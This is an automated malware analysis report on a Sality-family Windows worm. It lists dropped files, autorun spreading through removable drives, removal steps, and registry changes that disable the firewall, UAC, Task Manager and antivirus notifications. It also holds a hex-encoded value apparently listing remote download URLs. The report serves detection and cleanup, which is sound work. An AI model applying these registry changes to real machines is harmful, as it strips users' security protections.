not-a-virus:AdWare.Win32.SwiftBrowse.o (Kaspersky), Virus.Win32.Sality.FD, Virus.Win32.Sality.2.FD, VirusSality.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)Behaviour: Worm, Virus, Adware, WormAutorun
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: a78e948b9438fb5d0b463a9109373fed
SHA1: 2ef8856b7b309736cb5ced4a518da3facbd6b990
SHA256: 156fa42bd3c54c5730c66990be5c3c834b801c5bc82186e7771385c207dfb73e
SSDeep: 12288:EvHTO3scLzbKfI1s15Ap/G/8/3D0Fw/tN8dkmLtpHHHrh7OGwZpnZfI:EvHK3scL6j8/z0FmcLbH1OGwvnZg
Size: 659872 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:52:01
Analyzed on: WindowsXP SP3 32-bit
Summary: Virus. A program that recursively replicates a possibly evolved copy of itself.
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Virus's file once a user opens a drive's folder in Windows Explorer. |
Process activity
The Virus creates the following process(es):
%original file name%.exe:652
NetCrawl.mg.exe:1964
The Virus injects its code into the following process(es):
Explorer.EXE:532
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:652 makes changes in the file system.
The Virus creates and/or writes to the following file(s):
%WinDir%\system.ini (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\WmiInspector.dll (3039 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\NSISEncrypt.dll (3277 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ExecDos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\NetCrawl.mg.exe (8400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\mj (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\lm (128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\IpConfig.dll (4136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB2AB_Rar\%original file name%.exe (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ilg (259958 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns3.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns4.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\tlg (41 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsJSON.dll (7 bytes)
The Virus deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsa1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsJSON.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\WmiInspector.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\NSISEncrypt.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ExecDos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\NetCrawl.mg.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\mj (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\lm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\tlg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ilg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\IpConfig.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\System.dll (0 bytes)
Registry activity
The process %original file name%.exe:652 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:
[HKCU\Software\Aas]
"a4_116" = "831618036"
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Aas]
"a3_78" = "542637991"
"a3_79" = "549622726"
"a3_72" = "533156193"
"a3_73" = "506656128"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "2"
[HKCU\Software\Aas]
"a3_71" = "525712590"
"a3_76" = "561686245"
"a3_77" = "568613636"
"a3_74" = "513568291"
"a3_75" = "554631746"
"a4_108" = "774265068"
"a4_109" = "781434189"
"a4_102" = "731250342"
"a4_103" = "738419463"
"a4_100" = "716912100"
"a4_101" = "724081221"
"a4_106" = "759926826"
"a4_107" = "767095947"
"a4_104" = "745588584"
"a4_105" = "752757705"
"a2_59" = "422983856"
"a2_58" = "415802315"
"a2_53" = "379969112"
"a2_52" = "372800953"
"a2_51" = "365618500"
"a2_50" = "358449632"
"a2_57" = "408633546"
"a2_56" = "401467511"
"a2_55" = "394299628"
"a2_54" = "387133857"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Aas]
"a4_55" = "394301655"
"a4_54" = "387132534"
"a4_57" = "408639897"
"a4_56" = "401470776"
"a4_51" = "365625171"
"a4_50" = "358456050"
"a4_53" = "379963413"
"a4_52" = "372794292"
[HKCU\Software\Aas\695404737]
"50183847" = "1F9250EF2381E2D9AE4EF061ECA0F3D0A24F2023E89C2CC85BD49E90D6877045BE906EB0B25DD268CB741DC41D5C0FD47CEE5BA9EC3B7870BCA79176776C9A465761F37DEECEAF24ABF58324DE41122D8DABCB3B58798401D9A821FDDE7FC8A4F09BD1E0428648329420F6E9AF57D2FFB6D3C8D7335A31244418C372DFCCE75F"
[HKCU\Software\Aas]
"a4_59" = "422978139"
"a4_58" = "415809018"
[HKCU\Software\Aas\695404737]
"21507363" = "0"
[HKCU\Software\Aas]
"a3_94" = "690598327"
"a3_95" = "698045910"
"a3_96" = "671534665"
"a3_97" = "678453992"
"a3_90" = "662052915"
"a3_91" = "669107282"
"a3_92" = "643004661"
"a3_93" = "649993492"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Aas]
"a3_98" = "685967115"
"a3_99" = "726580138"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Aas]
"a2_99" = "709741282"
"a2_98" = "702576061"
"a2_97" = "695410606"
"a2_96" = "688239508"
"a2_95" = "681059844"
"a2_94" = "673890690"
"a2_93" = "666723460"
"a2_92" = "659566940"
"a2_91" = "652391676"
"a2_90" = "645229003"
"a1_58" = "545363527"
"a1_59" = "205689605"
"a1_56" = "3940586342"
"a1_57" = "2060004643"
"a1_54" = "2506314952"
"a1_55" = "680372722"
"a1_52" = "4207284457"
"a1_53" = "3523504239"
"a1_50" = "2646820777"
"a1_51" = "3330681222"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Aas]
"a3_43" = "324843106"
"a3_42" = "284237251"
"a3_41" = "277248416"
"a3_40" = "269796609"
"a3_47" = "353765350"
"a3_46" = "313221959"
"a3_45" = "305778468"
"a3_44" = "332278405"
"a3_49" = "368270520"
"a3_48" = "360822809"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Aas]
"a4_99" = "709742979"
"a4_98" = "702573858"
"a2_118" = "845962026"
"a4_91" = "652390011"
"a4_90" = "645220890"
"a4_93" = "666728253"
"a4_92" = "659559132"
"a4_95" = "681066495"
"a4_94" = "673897374"
"a4_97" = "695404737"
"a4_96" = "688235616"
"a3_109" = "798021476"
"a3_108" = "790966981"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallOverride" = "1"
[HKCU\Software\Aas]
"a3_101" = "707522668"
"a3_100" = "733503437"
"a3_103" = "754977070"
"a3_102" = "714511503"
"a3_105" = "769475040"
"a3_104" = "762555713"
"a3_107" = "750493346"
"a3_106" = "742980099"
"a2_113" = "810112586"
"a2_112" = "802943978"
"a3_70" = "485103791"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Aas]
"a2_110" = "788595675"
"a2_117" = "838793882"
"a2_116" = "831612138"
"a2_115" = "824446511"
"a2_114" = "817277332"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Aas]
"a1_104" = "3321202338"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UpdatesDisableNotify" = "1"
[HKCU\Software\Aas\695404737]
"35845605" = "402"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Aas]
"a3_116" = "814879197"
"a3_117" = "821922428"
"a3_114" = "834001179"
[HKLM\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify" = "1"
[HKCU\Software\Aas]
"a3_115" = "807894458"
"a1_89" = "16034278"
"a1_88" = "66581252"
"a1_85" = "3215076366"
"a1_84" = "796374511"
"a1_87" = "726907533"
"a1_86" = "786512168"
"a1_81" = "139351495"
"a1_80" = "3744106988"
"a1_83" = "3235138390"
"a3_110" = "771902343"
"a3_111" = "778955814"
"a1_67" = "1184186628"
"a1_66" = "3861986246"
"a1_65" = "477675258"
"a1_64" = "2462488458"
"a1_63" = "3938061697"
"a1_62" = "4069992483"
"a1_61" = "1862491724"
"a1_60" = "1304747143"
"a1_69" = "3815860347"
"a1_68" = "827716490"
"a1_12" = "3347564497"
"a1_13" = "522418618"
"a1_10" = "2640225927"
"a1_11" = "2032942692"
"a1_16" = "4114681913"
"a1_17" = "1545574841"
"a1_14" = "3901474534"
"a1_15" = "1014618575"
"a4_115" = "824448915"
"a4_114" = "817279794"
"a1_18" = "3513914988"
"a1_19" = "2871035642"
"a4_111" = "795772431"
"a4_110" = "788603310"
"a4_113" = "810110673"
"a4_112" = "802941552"
"a2_48" = "344127027"
"a2_49" = "351283360"
"a2_40" = "286765755"
"a2_41" = "293942851"
"a2_42" = "301097397"
"a2_43" = "308265093"
"a2_44" = "315446800"
"a2_45" = "322616157"
"a2_46" = "329783293"
"a2_47" = "336949814"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Aas]
"a4_42" = "301103082"
"a4_43" = "308272203"
"a4_40" = "286764840"
"a4_41" = "293933961"
"a4_46" = "329779566"
"a4_47" = "336948687"
"a4_44" = "315441324"
"a4_45" = "322610445"
"a4_48" = "344117808"
"a4_49" = "351286929"
"a3_18" = "112354555"
"a3_19" = "152901914"
"a3_14" = "83367783"
"a3_15" = "124488582"
"a3_16" = "131411001"
"a3_17" = "104906840"
"a3_10" = "88506851"
"a3_11" = "95435266"
"a3_12" = "69459621"
"a3_13" = "76378820"
"a4_37" = "265257477"
"a4_36" = "258088356"
"a4_35" = "250919235"
"a4_34" = "243750114"
"a4_33" = "236580993"
"a4_32" = "229411872"
"a4_31" = "222242751"
"a4_30" = "215073630"
"a4_39" = "279595719"
"a4_38" = "272426598"
"a1_103" = "4263468156"
"a1_102" = "3287715323"
[HKCU\Software\Aas\695404737]
"28676484" = "35"
[HKCU\Software\Aas]
"a1_101" = "959177234"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Aas]
"a2_88" = "630888512"
"a2_89" = "638057302"
"a2_84" = "602208452"
"a2_85" = "609373204"
"a2_86" = "616539846"
"a2_87" = "623706389"
"a2_80" = "573523784"
"a3_34" = "260325067"
"a2_82" = "587858648"
"a2_83" = "595044364"
"a1_29" = "3756295128"
"a1_28" = "2666588485"
"a1_23" = "1341895885"
"a1_22" = "1201749000"
"a1_21" = "3651443608"
"a1_20" = "3686174937"
"a1_27" = "3229029095"
"a1_26" = "2733721999"
"a1_25" = "2741006536"
"a1_24" = "3944226378"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Aas]
"a3_50" = "341766363"
"a3_51" = "348755322"
[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "1"
[HKCU\Software\Aas]
"a3_53" = "396796476"
"a3_54" = "370165343"
"a3_55" = "377748222"
"a3_56" = "384737041"
"a3_57" = "425210800"
"a3_58" = "432789459"
"a3_59" = "406145138"
"a2_111" = "795777928"
"a2_31" = "222234366"
"a2_30" = "215079716"
"a2_33" = "236579700"
"a2_32" = "229420813"
"a2_35" = "250914025"
"a2_34" = "243748196"
"a2_37" = "265265678"
"a2_36" = "258096247"
"a2_39" = "279598384"
"a2_38" = "272431193"
"a4_79" = "566360559"
"a4_78" = "559191438"
"a4_73" = "523345833"
"a4_72" = "516176712"
"a4_71" = "509007591"
"a4_70" = "501838470"
"a4_77" = "552022317"
"a4_76" = "544853196"
"a4_75" = "537684075"
"a4_74" = "530514954"
"a4_86" = "616544406"
"a4_87" = "623713527"
"a4_84" = "602206164"
"a4_85" = "609375285"
"a4_82" = "587867922"
"a4_83" = "595037043"
"a4_80" = "573529680"
"a4_81" = "580698801"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools" = "1"
[HKCU\Software\Aas]
"a4_88" = "630882648"
"a4_89" = "638051769"
"a2_100" = "716909694"
[HKCU\Software\Aas\695404737]
"14338242" = "0"
"7169121" = "217"
[HKCU\Software\Aas]
"a2_102" = "731243332"
"a2_103" = "738410538"
"a2_104" = "745596017"
"a2_105" = "752759678"
"a2_106" = "759926299"
"a2_107" = "767093664"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Aas]
"a1_96" = "4114495355"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"
[HKCU\Software\Aas]
"a1_107" = "75537886"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Aas]
"a1_106" = "1905142164"
"a1_105" = "2561533072"
"a1_98" = "559672055"
"a1_99" = "1110375132"
"a1_92" = "1109944736"
"a1_93" = "429891561"
"a1_90" = "3232901796"
"a1_91" = "563406027"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallDisableNotify" = "1"
[HKCU\Software\Aas]
"a1_97" = "350953880"
"a1_94" = "3962604742"
"a1_95" = "1304519820"
"a2_75" = "537689669"
"a2_74" = "530520381"
"a2_77" = "552020224"
"a2_76" = "544860422"
"a2_71" = "509014829"
"a2_70" = "501836153"
"a2_73" = "523353220"
"a2_72" = "516173523"
"a1_100" = "431852721"
"a2_79" = "566352092"
"a2_78" = "559189913"
"a1_74" = "1682865374"
"a1_75" = "2629242397"
"a1_76" = "1424397328"
"a1_77" = "63183220"
"a1_70" = "4017115453"
"a1_71" = "87761972"
"a1_72" = "2231819788"
"a1_73" = "2715500761"
"a1_78" = "3874640351"
"a1_79" = "2231058103"
"a1_109" = "901695256"
"a1_108" = "3790730434"
"a1_0" = "3183258191"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"
[HKCU\Software\Aas]
"a1_2" = "4080157083"
"a1_3" = "3907000049"
"a1_4" = "270366800"
"a1_5" = "2795759188"
"a1_6" = "2548062973"
"a1_7" = "1369105564"
"a3_29" = "224867540"
"a3_28" = "183865525"
"a1_116" = "2003951785"
"a1_117" = "847050724"
"a1_110" = "3187308900"
"a1_111" = "3361228126"
"a1_112" = "595962318"
"a1_9" = "3159057467"
"a3_21" = "167399900"
"a3_20" = "159956413"
"a3_23" = "148336286"
"a3_22" = "140888703"
"a3_25" = "195929936"
"a3_24" = "188875569"
"a3_27" = "176880658"
"a3_26" = "169827315"
"a4_24" = "172058904"
"a4_25" = "179228025"
"a4_26" = "186397146"
"a4_27" = "193566267"
"a4_20" = "143382420"
"a4_21" = "150551541"
"a4_22" = "157720662"
"a4_23" = "164889783"
"a4_28" = "200735388"
"a4_29" = "207904509"
"a2_81" = "580704669"
"a3_112" = "785940569"
"a3_113" = "826942712"
"a2_101" = "724089138"
"a1_38" = "1943117499"
"a1_39" = "1441008798"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"
[HKCU\Software\Aas]
"a1_30" = "2491654672"
"a1_31" = "3175058885"
"a1_32" = "4252732059"
"a1_33" = "1086018071"
"a1_34" = "126805938"
"a1_35" = "3807567877"
"a1_36" = "982601683"
"a1_37" = "189200723"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\Aas]
"a2_108" = "774260148"
"a2_109" = "781425946"
"a3_69" = "478110732"
"a3_68" = "470664173"
"a3_65" = "449123976"
"a3_64" = "442135145"
"a3_67" = "497168202"
"a3_66" = "489720619"
"a3_61" = "454263092"
"a3_60" = "413199509"
"a3_63" = "468244982"
"a3_62" = "461186391"
"a1_1" = "481917349"
"a2_28" = "200730093"
"a2_29" = "207898152"
"a2_26" = "186396554"
"a2_27" = "193562647"
"a2_24" = "172061441"
"a2_25" = "179230362"
"a2_22" = "157727157"
"a2_23" = "164895666"
"a2_20" = "143379376"
"a2_21" = "150542710"
"a4_68" = "487500228"
"a4_69" = "494669349"
"a4_60" = "430147260"
"a4_61" = "437316381"
"a4_62" = "444485502"
"a4_63" = "451654623"
"a4_64" = "458823744"
"a4_65" = "465992865"
"a4_66" = "473161986"
"a4_67" = "480331107"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Aas]
"a2_7" = "50177102"
"a2_6" = "43022743"
"a2_5" = "35842126"
"a2_4" = "28674212"
"a2_3" = "21499892"
"a2_2" = "14341029"
"a2_1" = "7174630"
"a2_0" = "5951"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Aas]
"a2_9" = "64528147"
"a4_5" = "35845605"
"a4_4" = "28676484"
"a4_7" = "50183847"
"a4_6" = "43014726"
"a4_1" = "7169121"
"a4_0" = "0"
"a4_3" = "21507363"
"a4_2" = "14338242"
"a4_9" = "64522089"
"a4_8" = "57352968"
"a3_52" = "389745053"
"a2_8" = "57359054"
"a3_87" = "607024862"
"a3_86" = "633131711"
"a3_85" = "626081308"
"a3_84" = "585598461"
"a3_83" = "578085210"
"a3_82" = "571034939"
"a3_81" = "597665944"
"a3_80" = "590099577"
"a3_89" = "654610320"
"a3_88" = "614067057"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 DF 10 C0 5B AE 62 FE 5E 62 5D 2E C7 01 CD 61"
[HKCU\Software\Aas]
"a1_8" = "1443424694"
"a1_82" = "850347685"
"a2_62" = "444485803"
"a2_63" = "451651996"
"a2_60" = "430152107"
"a2_61" = "437317681"
"a2_66" = "473167898"
"a2_67" = "480334420"
"a2_64" = "458819313"
"a2_65" = "465986252"
"a2_68" = "487503764"
"a2_69" = "494670698"
"a1_41" = "238612446"
"a1_40" = "1419969911"
"a1_43" = "3582830897"
"a1_42" = "323824292"
"a1_45" = "3015243103"
"a1_44" = "2821628314"
"a1_47" = "3861899901"
"a1_46" = "1101151282"
"a1_49" = "2566100455"
"a1_48" = "1730315373"
[HKCU\Software\Aas\695404737]
"43014726" = "0B00687474703A2F2F6572656E6B61726168616E2E636F6D2F696D616765732F6C6F676F2E67696600687474703A2F2F677574656B706C2E7A612E706C2F6C6F676F2E67696600687474703A2F2F7777772E6B61707564616E652E636F6D2F6C6F676F2E67696600687474703A2F2F69676F72666F6D696E2E72752F6C6F676F2E67696600687474703A2F2F6D32636F6D756E69636163696F6E2E636F6D2F696D616765732F6C6F676F2E67696600687474703A2F2F6C65656E61656E7465727072697365732E636F6D2F696D672F6C6F676F2E67696600687474703A2F2F7777772E67657269617472696173696E6F702E636F6D2E62722F696D672F627574746F6E2E67696600687474703A2F2F627269746973686D6F746F72732E69742F6C6F676F2E67696600687474703A2F2F617274726F6F6D2E636F6D2E74722F626C6F672F6C6F676F2E67696600687474703A2F2F67616D6D61636F6E7365696C2E66722F696D616765732F627574746F6E2E67696600687474703A2F2F786578796C69612E636F6D2F6C6F676F2E676966"
[HKCU\Software\Aas]
"a3_118" = "862924447"
"a1_114" = "4133660471"
"a1_115" = "2776377689"
"a3_36" = "241268621"
"a3_37" = "248309804"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UacDisableNotify" = "1"
[HKCU\Software\Aas]
"a3_35" = "267899754"
"a3_32" = "212854281"
"a3_33" = "253401768"
"a3_30" = "231909751"
"a3_31" = "205278614"
"a1_113" = "1283144070"
"a3_38" = "289377359"
"a3_39" = "296296686"
"a1_118" = "2422978816"
"a2_17" = "121866737"
"a2_16" = "114712328"
"a2_15" = "107542081"
"a2_14" = "100362345"
"a2_13" = "93195901"
"a2_12" = "86024915"
"a2_11" = "78869622"
"a2_10" = "71696066"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = "1"
[HKCU\Software\Aas]
"a2_19" = "136210088"
"a2_18" = "129045649"
"a4_11" = "78860331"
"a4_10" = "71691210"
"a4_13" = "93198573"
"a4_12" = "86029452"
"a4_15" = "107536815"
"a4_14" = "100367694"
"a4_17" = "121875057"
"a4_16" = "114705936"
"a4_19" = "136213299"
"a4_18" = "129044178"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
[HKCU\Software\Aas]
"a3_8" = "40388897"
"a3_9" = "47967552"
"a3_6" = "59977839"
"a3_7" = "67032206"
"a3_4" = "11991981"
"a3_5" = "52535244"
"a3_2" = "31040235"
"a3_3" = "4933386"
"a3_0" = "17001001"
"a3_1" = "23989832"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Aas]
"a4_118" = "845956278"
"a4_117" = "838787157"
The Virus modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
Firewall notifications are disabled:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = "1"
The Virus modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Task Manager is disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr" = "1"
The Virus modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
A firewall is disabled:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\c:]
"%original file name%.exe" = "c:\%original file name%.exe:*:Enabled:ipsec"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusDisableNotify" = "1"
The Virus deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process NetCrawl.mg.exe:1964 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B EE FD F8 71 86 00 99 F2 FB 6D F8 2E 65 BA 8A"
Dropped PE files
MD5 | File path |
---|---|
9b22fa552e37770118146e753a34d03f | c:\xfdei.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Virus's file once a user opens a drive's folder in Windows Explorer.
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:652
NetCrawl.mg.exe:1964 - Delete the original Virus file.
- Delete or disinfect the following files created/modified by the Virus:
%WinDir%\system.ini (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\WmiInspector.dll (3039 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\NSISEncrypt.dll (3277 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ExecDos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\NetCrawl.mg.exe (8400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\mj (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\lm (128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\IpConfig.dll (4136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB2AB_Rar\%original file name%.exe (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ilg (259958 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns3.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns4.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\tlg (41 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsJSON.dll (7 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
